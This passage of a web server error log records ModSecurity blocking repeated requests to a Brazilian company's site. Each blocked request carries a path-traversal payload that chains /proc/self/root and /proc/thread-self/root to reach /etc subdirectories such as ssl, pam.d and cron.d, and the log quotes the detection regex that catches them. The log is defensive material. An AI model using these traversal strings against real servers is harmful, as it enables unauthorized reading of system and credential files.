"www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqW09a6ubjKNq_cu4aIzAAAA1Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:13:09.173345 2026] [:error] [pid 31803:tid 140411616036608] [client 74.7.243.128:48784] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqW1eyqAr6etmhZHNqulwAAAE8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:13:10.507011 2026] [:error] [pid 15826:tid 140411582465792] [client 74.7.243.128:41482] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqW1uoXxyEfFpUF8f9edQAAAVM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:13:11.738972 2026] [:error] [pid 17887:tid 140411624429312] [client 74.7.243.128:41486] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqW1wkwaGbbGflqUZAAqAAAAM4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:13:11.941319 2026] [:error] [pid 19507:tid 140411741927168] [client 74.7.244.43:42480] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqW19Y0UrI5A3LftIyTYQAAAYA"]
[Wed Mar 18 09:13:12.446351 2026] [:error] [pid 11816:tid 140411658000128] [client 74.7.228.61:46800] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqW2Ow_le52K8_3pV3PzgAAAgo"]
[Wed Mar 18 09:13:15.247011 2026] [:error] [pid 15826:tid 140411574073088] [client 74.7.243.128:41496] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqW2-oXxyEfFpUF8f9efQAAAVQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:13:17.420056 2026] [:error] [pid 15826:tid 140411666392832] [client 74.7.241.31:59934] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqW3eoXxyEfFpUF8f9egQAAAUk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:13:17.604675 2026] [:error] [pid 17887:tid 140411658000128] [client 74.7.243.128:41504] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqW3QkwaGbbGflqUZAArAAAAMo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:13:19.125658 2026] [:error] [pid 15826:tid 140411691570944] [client 74.7.241.31:58164] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqW3-oXxyEfFpUF8f9egwAAAUY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:13:21.509850 2026] [:error] [pid 26799:tid 140411590858496] [client 74.7.243.128:41516] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqW4da6ubjKNq_cu4aI2QAAA1I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:13:23.930982 2026] [:error] [pid 31803:tid 140411641214720] [client 74.7.243.128:60500] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqW4-yqAr6etmhZHNquqQAAAEw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:13:25.304025 2026] [:error] [pid 29882:tid 140411574073088] [client 74.7.243.128:60512] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqW5UzinOy1jxa1j4cEIgAAARQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:13:27.059669 2026] [:error] [pid 26799:tid 140411599251200] [client 74.7.243.128:60524] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqW5ta6ubjKNq_cu4aI4AAAA1E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:13:28.666997 2026] [:error] [pid 17653:tid 140411565680384] [client 74.7.243.128:60540] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqW6Mdf6f5d65gmYZTEygAAAtU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:13:31.493263 2026] [:error] [pid 30077:tid 140411683178240] [client 74.7.243.128:49628] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqW6vu8EFLIOrSqIpv1YgAAAkc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:13:33.007482 2026] [:error] [pid 30077:tid 140411574073088] [client 74.7.243.128:49640] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqW7fu8EFLIOrSqIpv1ZQAAAlQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:13:51.101345 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.243.128:49652] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqW_ta6ubjKNq_cu4aJDwAAA1U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:13:52.663158 2026] [:error] [pid 15051:tid 140411691570944] [client 74.7.243.128:35394] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqXACmAPhZkrhU8w4ldlQAAAIY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:13:54.007105 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.243.128:35402] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqXAta6ubjKNq_cu4aJGgAAA0U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:13:59.699518 2026] [:error] [pid 29882:tid 140411616036608] [client 74.7.243.128:35418] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqXB0zinOy1jxa1j4cEOgAAAQ8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:14:02.055840 2026] [:error] [pid 17887:tid 140411666392832] [client 74.7.243.128:34202] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqXCgkwaGbbGflqUZAAygAAAMk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:14:07.570876 2026] [:error] [pid 29882:tid 140411624429312] [client 74.7.243.128:34206] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqXD0zinOy1jxa1j4cETAAAAQ4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
